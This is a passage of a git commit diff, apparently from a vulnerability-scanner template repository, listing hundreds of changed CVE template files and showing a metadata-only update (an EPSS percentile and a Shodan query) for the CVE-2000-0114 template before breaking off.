http/cves/2022/CVE-2022-35416.yaml | 4 ++-- http/cves/2022/CVE-2022-35493.yaml | 5 ++-- http/cves/2022/CVE-2022-35653.yaml | 6 +++-- http/cves/2022/CVE-2022-3578.yaml | 4 ++-- http/cves/2022/CVE-2022-35914.yaml | 2 ++ http/cves/2022/CVE-2022-36446.yaml | 2 ++ http/cves/2022/CVE-2022-36537.yaml | 2 ++ http/cves/2022/CVE-2022-36553.yaml | 4 ++-- http/cves/2022/CVE-2022-36642.yaml | 2 ++ http/cves/2022/CVE-2022-36804.yaml | 4 ++-- http/cves/2022/CVE-2022-37153.yaml | 1 + http/cves/2022/CVE-2022-37190.yaml | 4 ++-- http/cves/2022/CVE-2022-37299.yaml | 4 ++-- http/cves/2022/CVE-2022-3768.yaml | 4 ++-- http/cves/2022/CVE-2022-38131.yaml | 5 ++-- http/cves/2022/CVE-2022-38463.yaml | 2 ++ http/cves/2022/CVE-2022-38553.yaml | 6 +++-- http/cves/2022/CVE-2022-38637.yaml | 1 + http/cves/2022/CVE-2022-38794.yaml | 7 ++++-- http/cves/2022/CVE-2022-38817.yaml | 7 ++++-- http/cves/2022/CVE-2022-38870.yaml | 6 +++-- http/cves/2022/CVE-2022-39048.yaml | 6 +++-- http/cves/2022/CVE-2022-39195.yaml | 3 ++- http/cves/2022/CVE-2022-3980.yaml | 5 ++-- http/cves/2022/CVE-2022-3982.yaml | 5 ++-- http/cves/2022/CVE-2022-39952.yaml | 2 ++ http/cves/2022/CVE-2022-39960.yaml | 4 ++-- http/cves/2022/CVE-2022-39986.yaml | 1 + http/cves/2022/CVE-2022-40022.yaml | 8 +++---- http/cves/2022/CVE-2022-40032.yaml | 4 ++-- http/cves/2022/CVE-2022-40047.yaml | 1 + http/cves/2022/CVE-2022-40083.yaml | 4 ++-- http/cves/2022/CVE-2022-40127.yaml | 6 +++-- http/cves/2022/CVE-2022-4049.yaml | 2 ++ http/cves/2022/CVE-2022-4050.yaml | 2 +- http/cves/2022/CVE-2022-4057.yaml | 2 ++ http/cves/2022/CVE-2022-4059.yaml | 7 ++++-- http/cves/2022/CVE-2022-4063.yaml | 4 ++-- http/cves/2022/CVE-2022-40734.yaml | 6 +++-- http/cves/2022/CVE-2022-40843.yaml | 8 +++---- http/cves/2022/CVE-2022-40879.yaml | 5 ++-- http/cves/2022/CVE-2022-40881.yaml | 10 ++++---- http/cves/2022/CVE-2022-4117.yaml | 2 +- http/cves/2022/CVE-2022-41412.yaml | 6 ++--- http/cves/2022/CVE-2022-41441.yaml | 1 + http/cves/2022/CVE-2022-41473.yaml | 3 ++- http/cves/2022/CVE-2022-42094.yaml | 1 + http/cves/2022/CVE-2022-42096.yaml | 5 ++-- http/cves/2022/CVE-2022-42233.yaml | 1 + http/cves/2022/CVE-2022-42746.yaml | 1 + http/cves/2022/CVE-2022-42747.yaml | 1 + http/cves/2022/CVE-2022-42748.yaml | 5 ++-- http/cves/2022/CVE-2022-42749.yaml | 1 + http/cves/2022/CVE-2022-4295.yaml | 7 ++++-- http/cves/2022/CVE-2022-43014.yaml | 6 +++-- http/cves/2022/CVE-2022-43015.yaml | 6 +++-- http/cves/2022/CVE-2022-43016.yaml | 2 ++ http/cves/2022/CVE-2022-43017.yaml | 2 ++ http/cves/2022/CVE-2022-43018.yaml | 9 ++++++-- http/cves/2022/CVE-2022-4305.yaml | 6 +++-- http/cves/2022/CVE-2022-43164.yaml | 1 + http/cves/2022/CVE-2022-43165.yaml | 1 + http/cves/2022/CVE-2022-43166.yaml | 2 ++ http/cves/2022/CVE-2022-43167.yaml | 1 + http/cves/2022/CVE-2022-43169.yaml | 6 +++-- http/cves/2022/CVE-2022-43170.yaml | 6 +++-- http/cves/2022/CVE-2022-43185.yaml | 2 ++ http/cves/2022/CVE-2022-4321.yaml | 2 ++ http/cves/2022/CVE-2022-43769.yaml | 1 + http/cves/2022/CVE-2022-44290.yaml | 4 ++-- http/cves/2022/CVE-2022-4447.yaml | 6 +++-- http/cves/2022/CVE-2022-44877.yaml | 2 ++ http/cves/2022/CVE-2022-44944.yaml | 1 + http/cves/2022/CVE-2022-44946.yaml | 1 + http/cves/2022/CVE-2022-44947.yaml | 1 + http/cves/2022/CVE-2022-44948.yaml | 4 +++- http/cves/2022/CVE-2022-44949.yaml | 2 ++ http/cves/2022/CVE-2022-44950.yaml | 2 ++ http/cves/2022/CVE-2022-44951.yaml | 4 +++- http/cves/2022/CVE-2022-44952.yaml | 2 ++ http/cves/2022/CVE-2022-44957.yaml | 2 +- http/cves/2022/CVE-2022-45354.yaml | 5 ++-- http/cves/2022/CVE-2022-45365.yaml | 2 ++ http/cves/2022/CVE-2022-45805.yaml | 2 +- http/cves/2022/CVE-2022-45917.yaml | 3 ++- http/cves/2022/CVE-2022-45933.yaml | 6 +++-- http/cves/2022/CVE-2022-46020.yaml | 4 ++-- http/cves/2022/CVE-2022-46073.yaml | 2 +- http/cves/2022/CVE-2022-46169.yaml | 2 ++ http/cves/2022/CVE-2022-46381.yaml | 1 + http/cves/2022/CVE-2022-46463.yaml | 1 + http/cves/2022/CVE-2022-46888.yaml | 7 ++++-- http/cves/2022/CVE-2022-46934.yaml | 5 ++-- http/cves/2022/CVE-2022-47002.yaml | 2 +- http/cves/2022/CVE-2022-47075.yaml | 4 ++-- http/cves/2022/CVE-2022-47615.yaml | 6 +++-- http/cves/2022/CVE-2022-47945.yaml | 6 +++-- http/cves/2022/CVE-2022-47966.yaml | 2 ++ http/cves/2022/CVE-2022-47986.yaml | 10 ++++---- http/cves/2022/CVE-2022-48012.yaml | 2 ++ http/cves/2022/CVE-2022-48165.yaml | 1 + http/cves/2022/CVE-2022-48197.yaml | 5 ++-- http/cves/2022/CVE-2022-4897.yaml | 6 +++-- http/cves/2023/CVE-2023-0099.yaml | 8 ++++--- http/cves/2023/CVE-2023-0126.yaml | 10 ++++---- http/cves/2023/CVE-2023-0159.yaml | 8 ++++--- http/cves/2023/CVE-2023-0236.yaml | 5 +++- http/cves/2023/CVE-2023-0297.yaml | 6 +++-- http/cves/2023/CVE-2023-0334.yaml | 6 +++-- http/cves/2023/CVE-2023-0448.yaml | 8 +++++-- http/cves/2023/CVE-2023-0514.yaml | 4 ++-- http/cves/2023/CVE-2023-0527.yaml | 4 ++-- http/cves/2023/CVE-2023-0552.yaml | 2 +- http/cves/2023/CVE-2023-0562.yaml | 2 +- http/cves/2023/CVE-2023-0600.yaml | 6 +++-- http/cves/2023/CVE-2023-0602.yaml | 4 ++-- http/cves/2023/CVE-2023-0630.yaml | 4 ++-- http/cves/2023/CVE-2023-0669.yaml | 6 +++-- http/cves/2023/CVE-2023-0678.yaml | 3 +++ http/cves/2023/CVE-2023-0900.yaml | 6 +++-- http/cves/2023/CVE-2023-0942.yaml | 4 ++-- http/cves/2023/CVE-2023-0947.yaml | 5 ++-- http/cves/2023/CVE-2023-0948.yaml | 4 ++-- http/cves/2023/CVE-2023-0968.yaml | 4 ++-- http/cves/2023/CVE-2023-1020.yaml | 4 ++-- http/cves/2023/CVE-2023-1080.yaml | 4 ++-- http/cves/2023/CVE-2023-1177.yaml | 6 +++-- http/cves/2023/CVE-2023-1263.yaml | 2 ++ http/cves/2023/CVE-2023-1362.yaml | 4 ++-- http/cves/2023/CVE-2023-1408.yaml | 2 ++ http/cves/2023/CVE-2023-1454.yaml | 1 + http/cves/2023/CVE-2023-1496.yaml | 4 ++-- http/cves/2023/CVE-2023-1546.yaml | 4 ++-- http/cves/2023/CVE-2023-1671.yaml | 5 ++-- http/cves/2023/CVE-2023-1698.yaml | 5 ++-- http/cves/2023/CVE-2023-1719.yaml | 5 ++-- http/cves/2023/CVE-2023-1730.yaml | 4 ++-- http/cves/2023/CVE-2023-1780.yaml | 4 +++- http/cves/2023/CVE-2023-1835.yaml | 3 +++ http/cves/2023/CVE-2023-1880.yaml | 5 ++-- http/cves/2023/CVE-2023-1890.yaml | 4 ++-- http/cves/2023/CVE-2023-1892.yaml | 11 +++++---- http/cves/2023/CVE-2023-20073.yaml | 4 ++-- http/cves/2023/CVE-2023-2009.yaml | 4 ++-- http/cves/2023/CVE-2023-2023.yaml | 4 ++-- http/cves/2023/CVE-2023-2059.yaml | 2 +- http/cves/2023/CVE-2023-20864.yaml | 6 +++-- http/cves/2023/CVE-2023-20887.yaml | 5 ++-- http/cves/2023/CVE-2023-20888.yaml | 6 +++-- http/cves/2023/CVE-2023-20889.yaml | 6 +++-- http/cves/2023/CVE-2023-2122.yaml | 4 ++-- http/cves/2023/CVE-2023-2130.yaml | 4 ++-- http/cves/2023/CVE-2023-2178.yaml | 2 +- http/cves/2023/CVE-2023-22232.yaml | 6 +++-- http/cves/2023/CVE-2023-2224.yaml | 4 ++-- http/cves/2023/CVE-2023-2227.yaml | 4 +++- http/cves/2023/CVE-2023-22432.yaml | 5 ++-- http/cves/2023/CVE-2023-22463.yaml | 4 ++-- http/cves/2023/CVE-2023-22478.yaml | 4 ++-- http/cves/2023/CVE-2023-22480.yaml | 4 ++-- http/cves/2023/CVE-2023-22515.yaml | 5 ++-- http/cves/2023/CVE-2023-22518.yaml | 5 ++-- http/cves/2023/CVE-2023-2252.yaml | 2 +- http/cves/2023/CVE-2023-22527.yaml | 7 +++--- http/cves/2023/CVE-2023-22620.yaml | 6 +++-- http/cves/2023/CVE-2023-2272.yaml | 4 ++-- http/cves/2023/CVE-2023-22897.yaml | 7 ++++-- http/cves/2023/CVE-2023-23161.yaml | 4 ++-- http/cves/2023/CVE-2023-23333.yaml | 4 ++-- http/cves/2023/CVE-2023-23488.yaml | 8 +++++-- http/cves/2023/CVE-2023-23489.yaml | 4 ++-- http/cves/2023/CVE-2023-23491.yaml | 6 +++-- http/cves/2023/CVE-2023-23492.yaml | 6 +++-- http/cves/2023/CVE-2023-2356.yaml | 5 ++-- http/cves/2023/CVE-2023-23752.yaml | 5 ++-- http/cves/2023/CVE-2023-24044.yaml | 5 ++-- http/cves/2023/CVE-2023-24243.yaml | 4 ++-- http/cves/2023/CVE-2023-24278.yaml | 5 ++-- http/cves/2023/CVE-2023-24322.yaml | 6 +++-- http/cves/2023/CVE-2023-24488.yaml | 6 +++-- http/cves/2023/CVE-2023-24489.yaml | 6 +++-- http/cves/2023/CVE-2023-24657.yaml | 5 ++-- http/cves/2023/CVE-2023-24733.yaml | 5 ++-- http/cves/2023/CVE-2023-24735.yaml | 5 ++-- http/cves/2023/CVE-2023-24737.yaml | 5 ++-- http/cves/2023/CVE-2023-2479.yaml | 6 +++-- http/cves/2023/CVE-2023-25135.yaml | 3 ++- http/cves/2023/CVE-2023-25157.yaml | 6 +++-- http/cves/2023/CVE-2023-25194.yaml | 5 ++-- http/cves/2023/CVE-2023-25346.yaml | 6 +++-- http/cves/2023/CVE-2023-25573.yaml | 5 ++-- http/cves/2023/CVE-2023-25717.yaml | 1 + http/cves/2023/CVE-2023-26035.yaml | 5 ++-- http/cves/2023/CVE-2023-26255.yaml | 6 +++-- http/cves/2023/CVE-2023-26256.yaml | 8 +++++-- http/cves/2023/CVE-2023-26347.yaml | 5 ++-- http/cves/2023/CVE-2023-26360.yaml | 2 ++ http/cves/2023/CVE-2023-26469.yaml | 6 ++--- http/cves/2023/CVE-2023-26842.yaml | 4 ++-- http/cves/2023/CVE-2023-26843.yaml | 4 ++-- http/cves/2023/CVE-2023-27008.yaml | 5 ++-- http/cves/2023/CVE-2023-27032.yaml | 6 ++--- http/cves/2023/CVE-2023-27034.yaml | 4 ++-- http/cves/2023/CVE-2023-27159.yaml | 6 +++-- http/cves/2023/CVE-2023-27179.yaml | 4 ++-- http/cves/2023/CVE-2023-27292.yaml | 4 +++- http/cves/2023/CVE-2023-2732.yaml | 4 ++-- http/cves/2023/CVE-2023-27350.yaml | 5 ++-- http/cves/2023/CVE-2023-27372.yaml | 5 ++-- http/cves/2023/CVE-2023-27482.yaml | 6 +++-- http/cves/2023/CVE-2023-27524.yaml | 5 ++-- http/cves/2023/CVE-2023-27587.yaml | 4 ++-- http/cves/2023/CVE-2023-27639.yaml | 4 ++-- http/cves/2023/CVE-2023-27640.yaml | 4 ++-- http/cves/2023/CVE-2023-2766.yaml | 5 ++-- http/cves/2023/CVE-2023-2779.yaml | 6 +++-- http/cves/2023/CVE-2023-2780.yaml | 8 +++++-- http/cves/2023/CVE-2023-27922.yaml | 6 +++-- http/cves/2023/CVE-2023-2796.yaml | 5 ++-- http/cves/2023/CVE-2023-28121.yaml | 6 +++-- http/cves/2023/CVE-2023-2813.yaml | 4 ++-- http/cves/2023/CVE-2023-2822.yaml | 5 ++-- http/cves/2023/CVE-2023-2825.yaml | 6 +++-- http/cves/2023/CVE-2023-28343.yaml | 6 +++-- http/cves/2023/CVE-2023-28432.yaml | 5 ++-- http/cves/2023/CVE-2023-28662.yaml | 5 ++-- http/cves/2023/CVE-2023-28665.yaml | 6 +++-- http/cves/2023/CVE-2023-29084.yaml | 4 ++-- http/cves/2023/CVE-2023-29298.yaml | 5 ++-- http/cves/2023/CVE-2023-29300.yaml | 5 ++-- http/cves/2023/CVE-2023-29357.yaml | 4 ++-- http/cves/2023/CVE-2023-29439.yaml | 6 +++-- http/cves/2023/CVE-2023-2948.yaml | 11 +++++---- http/cves/2023/CVE-2023-29489.yaml | 2 ++ http/cves/2023/CVE-2023-2949.yaml | 9 ++++---- http/cves/2023/CVE-2023-29622.yaml | 4 ++-- http/cves/2023/CVE-2023-29623.yaml | 4 ++-- http/cves/2023/CVE-2023-2982.yaml | 4 ++-- http/cves/2023/CVE-2023-29827.yaml | 4 ++-- http/cves/2023/CVE-2023-29887.yaml | 4 ++-- http/cves/2023/CVE-2023-29919.yaml | 8 +++---- http/cves/2023/CVE-2023-29922.yaml | 7 ++++-- http/cves/2023/CVE-2023-29923.yaml | 8 +++++-- http/cves/2023/CVE-2023-30013.yaml | 4 ++-- http/cves/2023/CVE-2023-30019.yaml | 4 ++-- http/cves/2023/CVE-2023-30150.yaml | 4 ++-- http/cves/2023/CVE-2023-30210.yaml | 4 ++-- http/cves/2023/CVE-2023-30212.yaml | 4 ++-- http/cves/2023/CVE-2023-30256.yaml | 5 ++-- http/cves/2023/CVE-2023-30258.yaml | 6 +++-- http/cves/2023/CVE-2023-30534.yaml | 4 +++- http/cves/2023/CVE-2023-30625.yaml | 4 ++-- http/cves/2023/CVE-2023-3077.yaml | 3 +-- http/cves/2023/CVE-2023-30777.yaml | 4 ++-- http/cves/2023/CVE-2023-30868.yaml | 4 ++-- http/cves/2023/CVE-2023-30943.yaml | 6 +++-- http/cves/2023/CVE-2023-31059.yaml | 5 ++-- http/cves/2023/CVE-2023-31446.yaml | 5 ++-- http/cves/2023/CVE-2023-31465.yaml | 5 ++-- http/cves/2023/CVE-2023-31548.yaml | 4 ++-- http/cves/2023/CVE-2023-32077.yaml | 7 +++--- http/cves/2023/CVE-2023-3219.yaml | 7 ++++-- http/cves/2023/CVE-2023-32243.yaml | 4 ++-- http/cves/2023/CVE-2023-32315.yaml | 6 +++-- http/cves/2023/CVE-2023-32563.yaml | 4 ++-- http/cves/2023/CVE-2023-33338.yaml | 4 ++-- http/cves/2023/CVE-2023-33405.yaml | 2 ++ http/cves/2023/CVE-2023-33439.yaml | 4 ++-- http/cves/2023/CVE-2023-33440.yaml | 5 ++-- http/cves/2023/CVE-2023-3345.yaml | 4 ++-- http/cves/2023/CVE-2023-33510.yaml | 5 ++-- http/cves/2023/CVE-2023-33568.yaml | 5 ++-- http/cves/2023/CVE-2023-33584.yaml | 4 ++-- http/cves/2023/CVE-2023-33629.yaml | 4 ++-- http/cves/2023/CVE-2023-3368.yaml | 4 ++-- http/cves/2023/CVE-2023-33831.yaml | 4 ++-- http/cves/2023/CVE-2023-34020.yaml | 10 +++++++- http/cves/2023/CVE-2023-34124.yaml | 5 ++-- http/cves/2023/CVE-2023-34259.yaml | 5 ++-- http/cves/2023/CVE-2023-34362.yaml | 5 ++-- http/cves/2023/CVE-2023-34537.yaml | 9 ++++++-- http/cves/2023/CVE-2023-34598.yaml | 4 ++-- http/cves/2023/CVE-2023-34599.yaml | 6 ++++- http/cves/2023/CVE-2023-3460.yaml | 6 +++-- http/cves/2023/CVE-2023-34659.yaml | 5 ++-- http/cves/2023/CVE-2023-34751.yaml | 4 ++-- http/cves/2023/CVE-2023-34752.yaml | 4 ++-- http/cves/2023/CVE-2023-34753.yaml | 4 ++-- http/cves/2023/CVE-2023-34755.yaml | 4 ++-- http/cves/2023/CVE-2023-34756.yaml | 4 ++-- http/cves/2023/CVE-2023-3479.yaml | 4 +++- http/cves/2023/CVE-2023-34843.yaml | 5 ++-- http/cves/2023/CVE-2023-34960.yaml | 4 ++-- http/cves/2023/CVE-2023-34993.yaml | 11 ++++++++- http/cves/2023/CVE-2023-35078.yaml | 4 ++-- http/cves/2023/CVE-2023-35082.yaml | 8 ++++--- http/cves/2023/CVE-2023-35158.yaml | 5 ++-- http/cves/2023/CVE-2023-35813.yaml | 6 +++-- http/cves/2023/CVE-2023-35843.yaml | 5 ++-- http/cves/2023/CVE-2023-35844.yaml | 2 ++ http/cves/2023/CVE-2023-35885.yaml | 7 +++--- http/cves/2023/CVE-2023-36144.yaml | 6 +++-- http/cves/2023/CVE-2023-36284.yaml | 7 +++--- http/cves/2023/CVE-2023-36287.yaml | 5 ++-- http/cves/2023/CVE-2023-36289.yaml | 5 ++-- http/cves/2023/CVE-2023-36306.yaml | 2 +- http/cves/2023/CVE-2023-36346.yaml | 4 ++-- http/cves/2023/CVE-2023-36347.yaml | 4 ++-- http/cves/2023/CVE-2023-36844.yaml | 8 +++---- http/cves/2023/CVE-2023-36845.yaml | 6 +++-- http/cves/2023/CVE-2023-36934.yaml | 5 ++-- http/cves/2023/CVE-2023-3710.yaml | 5 ++-- http/cves/2023/CVE-2023-37265.yaml | 4 ++-- http/cves/2023/CVE-2023-37266.yaml | 4 ++-- http/cves/2023/CVE-2023-37270.yaml | 6 +++-- http/cves/2023/CVE-2023-37462.yaml | 5 ++-- http/cves/2023/CVE-2023-37474.yaml | 7 ++++-- http/cves/2023/CVE-2023-37580.yaml | 4 ++-- http/cves/2023/CVE-2023-37629.yaml | 5 ++-- http/cves/2023/CVE-2023-3765.yaml | 6 +++-- http/cves/2023/CVE-2023-37679.yaml | 9 +++++--- http/cves/2023/CVE-2023-37728.yaml | 6 +++-- http/cves/2023/CVE-2023-37979.yaml | 4 +++- http/cves/2023/CVE-2023-38035.yaml | 5 ++-- http/cves/2023/CVE-2023-38203.yaml | 6 ++--- http/cves/2023/CVE-2023-38205.yaml | 5 ++-- http/cves/2023/CVE-2023-3836.yaml | 6 +++-- http/cves/2023/CVE-2023-3843.yaml | 2 +- http/cves/2023/CVE-2023-38433.yaml | 4 ++-- http/cves/2023/CVE-2023-3845.yaml | 2 +- http/cves/2023/CVE-2023-3847.yaml | 2 +- http/cves/2023/CVE-2023-3848.yaml | 4 ++-- http/cves/2023/CVE-2023-3849.yaml | 4 ++-- http/cves/2023/CVE-2023-38501.yaml | 6 +++-- http/cves/2023/CVE-2023-38646.yaml | 5 ++-- http/cves/2023/CVE-2023-38964.yaml | 5 ++-- http/cves/2023/CVE-2023-39002.yaml | 6 +++-- http/cves/2023/CVE-2023-39026.yaml | 10 ++++---- http/cves/2023/CVE-2023-39108.yaml | 7 ++++-- http/cves/2023/CVE-2023-39109.yaml | 6 +++-- http/cves/2023/CVE-2023-39110.yaml | 6 +++-- http/cves/2023/CVE-2023-39141.yaml | 8 +++++-- http/cves/2023/CVE-2023-39143.yaml | 5 ++-- http/cves/2023/CVE-2023-3936.yaml | 4 ++-- http/cves/2023/CVE-2023-39361.yaml | 6 +++-- http/cves/2023/CVE-2023-39598.yaml | 6 +++-- http/cves/2023/CVE-2023-39600.yaml | 6 +++-- http/cves/2023/CVE-2023-39676.yaml | 3 ++- http/cves/2023/CVE-2023-39677.yaml | 4 ++-- http/cves/2023/CVE-2023-39700.yaml | 4 +++- http/cves/2023/CVE-2023-39796.yaml | 4 ++-- http/cves/2023/CVE-2023-40208.yaml | 7 ++++-- http/cves/2023/CVE-2023-40355.yaml | 3 ++- http/cves/2023/CVE-2023-40779.yaml | 6 +++-- http/cves/2023/CVE-2023-4110.yaml | 2 +- http/cves/2023/CVE-2023-41109.yaml | 8 +++---- http/cves/2023/CVE-2023-4111.yaml | 2 +- http/cves/2023/CVE-2023-4112.yaml | 3 ++- http/cves/2023/CVE-2023-4113.yaml | 4 ++-- http/cves/2023/CVE-2023-4114.yaml | 4 ++-- http/cves/2023/CVE-2023-4115.yaml | 2 +- http/cves/2023/CVE-2023-4116.yaml | 3 ++- http/cves/2023/CVE-2023-41265.yaml | 6 +++-- http/cves/2023/CVE-2023-41266.yaml | 6 +++-- http/cves/2023/CVE-2023-4148.yaml | 6 +++-- http/cves/2023/CVE-2023-41538.yaml | 7 ++++-- http/cves/2023/CVE-2023-41642.yaml | 4 ++-- http/cves/2023/CVE-2023-4168.yaml | 4 ++-- http/cves/2023/CVE-2023-4169.yaml | 5 ++-- http/cves/2023/CVE-2023-4173.yaml | 5 ++-- http/cves/2023/CVE-2023-4174.yaml | 5 ++-- http/cves/2023/CVE-2023-41763.yaml | 5 ++-- http/cves/2023/CVE-2023-41892.yaml | 5 ++-- http/cves/2023/CVE-2023-42442.yaml | 6 +++-- http/cves/2023/CVE-2023-42793.yaml | 5 ++-- http/cves/2023/CVE-2023-43177.yaml | 6 +++-- http/cves/2023/CVE-2023-43187.yaml | 5 ++-- http/cves/2023/CVE-2023-43208.yaml | 8 ++++--- http/cves/2023/CVE-2023-43261.yaml | 8 +++---- http/cves/2023/CVE-2023-43325.yaml | 6 +++-- http/cves/2023/CVE-2023-43326.yaml | 6 +++-- http/cves/2023/CVE-2023-43374.yaml | 6 ++--- http/cves/2023/CVE-2023-43795.yaml | 5 ++-- http/cves/2023/CVE-2023-4415.yaml | 6 +++-- http/cves/2023/CVE-2023-44352.yaml | 2 ++ http/cves/2023/CVE-2023-44353.yaml | 9 +++++--- http/cves/2023/CVE-2023-4451.yaml | 5 ++-- http/cves/2023/CVE-2023-44812.yaml | 6 ++--- http/cves/2023/CVE-2023-44813.yaml | 6 +++-- http/cves/2023/CVE-2023-4521.yaml | 6 ++--- http/cves/2023/CVE-2023-45375.yaml | 7 +++--- http/cves/2023/CVE-2023-4542.yaml | 10 ++++---- http/cves/2023/CVE-2023-4547.yaml | 4 ++-- http/cves/2023/CVE-2023-45542.yaml | 4 +++- http/cves/2023/CVE-2023-45671.yaml | 8 ++++++- http/cves/2023/CVE-2023-4568.yaml | 6 +++-- http/cves/2023/CVE-2023-45852.yaml | 5 ++-- http/cves/2023/CVE-2023-45855.yaml | 6 +++-- http/cves/2023/CVE-2023-4596.yaml | 7 +++--- http/cves/2023/CVE-2023-4634.yaml | 6 +++-- http/cves/2023/CVE-2023-46347.yaml | 4 ++-- http/cves/2023/CVE-2023-46359.yaml | 13 +++++++++-- http/cves/2023/CVE-2023-46574.yaml | 6 +++-- http/cves/2023/CVE-2023-46747.yaml | 6 +++-- http/cves/2023/CVE-2023-46805.yaml | 8 ++++--- http/cves/2023/CVE-2023-4714.yaml | 4 ++-- http/cves/2023/CVE-2023-47211.yaml | 4 +++- http/cves/2023/CVE-2023-47218.yaml | 12 ++++++---- http/cves/2023/CVE-2023-47246.yaml | 4 ++-- http/cves/2023/CVE-2023-47643.yaml | 8 +++++-- http/cves/2023/CVE-2023-48084.yaml | 7 ++++-- http/cves/2023/CVE-2023-49070.yaml | 4 ++-- http/cves/2023/CVE-2023-49103.yaml | 2 ++ http/cves/2023/CVE-2023-4966.yaml | 6 +++-- http/cves/2023/CVE-2023-4973.yaml | 2 +- http/cves/2023/CVE-2023-4974.yaml | 5 ++-- http/cves/2023/CVE-2023-49785.yaml | 2 +- http/cves/2023/CVE-2023-5003.yaml | 8 +++---- http/cves/2023/CVE-2023-50290.yaml | 4 +++- http/cves/2023/CVE-2023-5074.yaml | 4 ++-- http/cves/2023/CVE-2023-5089.yaml | 6 +++-- http/cves/2023/CVE-2023-50917.yaml | 4 ++-- http/cves/2023/CVE-2023-50968.yaml | 4 ++-- http/cves/2023/CVE-2023-51467.yaml | 4 ++-- http/cves/2023/CVE-2023-52085.yaml | 3 ++- http/cves/2023/CVE-2023-5244.yaml | 5 ++-- http/cves/2023/CVE-2023-5360.yaml | 7 +++--- http/cves/2023/CVE-2023-5375.yaml | 4 ++-- http/cves/2023/CVE-2023-5556.yaml | 3 ++- http/cves/2023/CVE-2023-5830.yaml | 4 +++- http/cves/2023/CVE-2023-5914.yaml | 3 ++- http/cves/2023/CVE-2023-5991.yaml | 6 +++-- http/cves/2023/CVE-2023-6018.yaml | 4 +++- http/cves/2023/CVE-2023-6020.yaml | 3 ++- http/cves/2023/CVE-2023-6021.yaml | 3 ++- http/cves/2023/CVE-2023-6023.yaml | 4 +++- http/cves/2023/CVE-2023-6038.yaml | 8 ++++--- http/cves/2023/CVE-2023-6063.yaml | 4 +++- http/cves/2023/CVE-2023-6065.yaml | 4 ++-- http/cves/2023/CVE-2023-6114.yaml | 7 +++--- http/cves/2023/CVE-2023-6360.yaml | 2 +- http/cves/2023/CVE-2023-6379.yaml | 6 +++-- http/cves/2023/CVE-2023-6380.yaml | 4 +++- http/cves/2023/CVE-2023-6389.yaml | 4 +++- http/cves/2023/CVE-2023-6553.yaml | 4 +++- http/cves/2023/CVE-2023-6567.yaml | 2 ++ http/cves/2023/CVE-2023-6623.yaml | 2 ++ http/cves/2023/CVE-2023-6634.yaml | 6 +++-- http/cves/2023/CVE-2023-6831.yaml | 8 ++++--- http/cves/2023/CVE-2023-6875.yaml | 6 +++-- http/cves/2023/CVE-2023-6895.yaml | 8 +++++-- http/cves/2023/CVE-2023-6909.yaml | 6 +++-- http/cves/2023/CVE-2023-6977.yaml | 6 +++-- http/cves/2023/CVE-2023-6989.yaml | 9 +++++--- http/cves/2023/CVE-2023-7028.yaml | 17 +++++++++----- http/cves/2024/CVE-2024-0195.yaml | 7 +++--- http/cves/2024/CVE-2024-0200.yaml | 7 +++--- http/cves/2024/CVE-2024-0204.yaml | 2 +- http/cves/2024/CVE-2024-0235.yaml | 1 + http/cves/2024/CVE-2024-0305.yaml | 6 +++-- http/cves/2024/CVE-2024-0337.yaml | 2 +- http/cves/2024/CVE-2024-0352.yaml | 5 ++-- http/cves/2024/CVE-2024-0713.yaml | 1 + http/cves/2024/CVE-2024-1021.yaml | 1 + http/cves/2024/CVE-2024-1071.yaml | 2 +- http/cves/2024/CVE-2024-1208.yaml | 6 +++-- http/cves/2024/CVE-2024-1209.yaml | 6 +++++ http/cves/2024/CVE-2024-1210.yaml | 6 +++++ http/cves/2024/CVE-2024-1561.yaml | 6 ++--- http/cves/2024/CVE-2024-1709.yaml | 6 ++++- http/cves/2024/CVE-2024-20767.yaml | 6 +++-- http/cves/2024/CVE-2024-21644.yaml | 8 +++++-- http/cves/2024/CVE-2024-21645.yaml | 3 +++ http/cves/2024/CVE-2024-21683.yaml | 3 +-- http/cves/2024/CVE-2024-21887.yaml | 8 ++++--- http/cves/2024/CVE-2024-21893.yaml | 2 ++ http/cves/2024/CVE-2024-22024.yaml | 3 ++- http/cves/2024/CVE-2024-22319.yaml | 4 ++-- http/cves/2024/CVE-2024-22927.yaml | 4 ++-- http/cves/2024/CVE-2024-2340.yaml | 4 ++-- http/cves/2024/CVE-2024-23917.yaml | 4 +++- http/cves/2024/CVE-2024-24131.yaml | 4 +++- http/cves/2024/CVE-2024-24919.yaml | 4 ++-- http/cves/2024/CVE-2024-25735.yaml | 6 +++++ http/cves/2024/CVE-2024-26331.yaml | 34 ++++++++++++++++------------ http/cves/2024/CVE-2024-27198.yaml | 2 ++ http/cves/2024/CVE-2024-27956.yaml | 4 ++-- http/cves/2024/CVE-2024-28255.yaml | 6 ++--- http/cves/2024/CVE-2024-28734.yaml | 2 +- http/cves/2024/CVE-2024-2879.yaml | 15 +++++++----- http/cves/2024/CVE-2024-29059.yaml | 9 +++++--- http/cves/2024/CVE-2024-29269.yaml | 5 ++++ http/cves/2024/CVE-2024-3097.yaml | 6 +++-- http/cves/2024/CVE-2024-3136.yaml | 7 +++--- http/cves/2024/CVE-2024-31848.yaml | 6 ++--- http/cves/2024/CVE-2024-31849.yaml | 7 +++--- http/cves/2024/CVE-2024-31850.yaml | 6 ++--- http/cves/2024/CVE-2024-32399.yaml | 4 ++-- http/cves/2024/CVE-2024-3273.yaml | 14 +++++++----- http/cves/2024/CVE-2024-33575.yaml | 6 +++-- http/cves/2024/CVE-2024-33724.yaml | 1 + http/cves/2024/CVE-2024-3400.yaml | 18 ++++++++------- http/cves/2024/CVE-2024-4040.yaml | 2 +- http/cves/2024/CVE-2024-4348.yaml | 5 ++++ 1814 files changed, 4615 insertions(+), 2565 deletions(-) diff --git a/http/cves/2000/CVE-2000-0114.yaml b/http/cves/2000/CVE-2000-0114.yaml index 1017ec6d7c..721f26cc51 100644 --- a/http/cves/2000/CVE-2000-0114.yaml +++ b/http/cves/2000/CVE-2000-0114.yaml @@ -20,12 +20,13 @@ info: cve-id: CVE-2000-0114 cwe-id: NVD-CWE-Other epss-score: 0.15958 - epss-percentile: 0.95829 + epss-percentile: 0.95958 cpe: cpe:2.3:a:microsoft:internet_information_server:3.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: microsoft product: internet_information_server + shodan-query: cpe:"cpe:2.3:a:microsoft:internet_information_server" tags: cve,cve2000,frontpage,microsoft,edb http: diff --git a/http/cves/2001/CVE-2001-0537.yaml b/http/cves/2001/CVE-2001-0537.yaml index 57d6042605..b05800361d 100644 --- a/http/cves/2001/CVE-2001-0537.yaml +++ b/http/cves/2001/CVE-2001-0537.yaml @@ -22,7 +22,7 @@ info: cve-id: 